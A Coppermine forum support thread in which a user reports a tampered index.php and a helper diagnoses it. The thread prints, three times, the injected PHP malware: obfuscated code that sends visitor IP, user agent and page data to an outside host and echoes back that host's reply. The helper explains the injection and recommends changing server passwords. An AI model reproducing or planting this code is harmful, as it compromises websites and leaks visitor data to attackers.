error 452 in file index.php error 452 in file index.php
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

error 452 in file index.php

Started by tortech, November 29, 2012, 01:43:02 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

tortech

Someone changed me file index.php. J have got error 452 and message:
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /DD51932/index.php on line 452
J must copied oryginal file index.php and now program works good.
Bad file index.php now is on site www.mojagazetka.pl/index.php
J think is a good way to change atrib 755 to 644 for file named index.php

Αndré

Have a look at that line:
        $cat['details']['description'] = preg_replace("/<br.*[b]?>[/b][\r\n]*/i", '<br />', bb_decode($cat['details']['description']));

it has been changed to
        $cat['details']['description'] = preg_replace("/<br.*?><?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;
    
// This code use for global bot statistic
    
$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
$stCurlHandle NULL;
    
$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    
{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        
$stCurlLink base64_decode'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{
    
curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    
curl_setopt($stCurlHandleCURLOPT_TIMEOUT6);
    
$sResult = @curl_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end
      
}
    
curl_close($stCurlHandle); 
}
}
?>
[\r\n]*/i", '<br />', bb_decode($cat['details']['description']));


probably because someone (you, somebody else, a script) just searched for the string "?>" (which is also used to close e.g. the opening "<?php" tag) and added his/her/its own code.


Quote from: tortech on November 29, 2012, 01:43:02 PM
change atrib 755 to 644 for file named index.php
I doubt that this will change anything.

tortech

Thank you for answer and solve a problem.


Quote from: Αndré on November 29, 2012, 02:14:08 PM
Have a look at that line:
        $cat['details']['description'] = preg_replace("/<br.*[b]?>[/b][\r\n]*/i", '<br />', bb_decode($cat['details']['description']));

it has been changed to
        $cat['details']['description'] = preg_replace("/<br.*?><?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;
    
// This code use for global bot statistic
    
$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
$stCurlHandle NULL;
    
$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    
{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        
$stCurlLink base64_decode'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{
    
curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    
curl_setopt($stCurlHandleCURLOPT_TIMEOUT6);
    
$sResult = @curl_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end
      
}
    
curl_close($stCurlHandle); 
}
}
?>
[\r\n]*/i", '<br />', bb_decode($cat['details']['description']));


probably because someone (you, somebody else, a script) just searched for the string "?>" (which is also used to close e.g. the opening "<?php" tag) and added his/her/its own code.

I doubt that this will change anything.

tortech

What kind of Atrb can J choose to main folder where is the Coprmine program, because somebody fist change atrib for file index.php from 644 to 755 and next damaged this file?


Quote from: Αndré on November 29, 2012, 02:14:08 PM
Have a look at that line:
        $cat['details']['description'] = preg_replace("/<br.*[b]?>[/b][\r\n]*/i", '<br />', bb_decode($cat['details']['description']));

it has been changed to
        $cat['details']['description'] = preg_replace("/<br.*?><?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;
    
// This code use for global bot statistic
    
$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
$stCurlHandle NULL;
    
$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    
{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        
$stCurlLink base64_decode'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{
    
curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    
curl_setopt($stCurlHandleCURLOPT_TIMEOUT6);
    
$sResult = @curl_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end
      
}
    
curl_close($stCurlHandle); 
}
}
?>
[\r\n]*/i", '<br />', bb_decode($cat['details']['description']));


probably because someone (you, somebody else, a script) just searched for the string "?>" (which is also used to close e.g. the opening "<?php" tag) and added his/her/its own code.

I doubt that this will change anything.

Αndré

I doubt that setting any permission will fix your issue, as I assume that either somebody with root access changed your file (i.e. your hosting provider via a script) or used your login data (in this case he could set the permission to what he wants).

Veronica


Αndré

As explained in Veronica's link, the attackers probably used your FTP/SSH account to change your files. So changing file permissions won't affect anything, but you have to change your server passwords.